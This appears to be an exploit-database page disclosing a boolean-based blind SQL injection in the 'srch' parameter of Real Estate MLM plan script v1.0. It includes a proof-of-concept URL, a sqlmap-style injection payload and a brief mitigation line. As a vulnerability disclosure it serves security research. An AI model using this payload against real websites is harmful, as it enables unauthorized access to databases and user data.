header-logo
Suggest Exploit
vendor:
Real Estate MLM plan script
by:
8bitsec
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Real Estate MLM plan script
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0 | Mac OS 10.12.6
2017

Real Estate MLM plan script v1.0 – ‘srch’ Parameter SQL Injection

SQL injection on [srch] parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc Parameter: srch (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection
# Date: 2017-09-28
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.mlmscript.in/
# Software Link: http://www.mlmscript.in/real-estate-mlm-script.html
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-28

Product & Service Introduction:
===============================
Real Estate MLM plan script we have used influential and having advanced secure database system here, that will help protect your user's sensitive details from outside attackers here we use newest technology to develop this Real Estate script.

Technical Details & Description:
================================

SQL injection on [srch] parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc

Parameter: srch (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc

==================
8bitsec - [https://twitter.com/_8bitsec]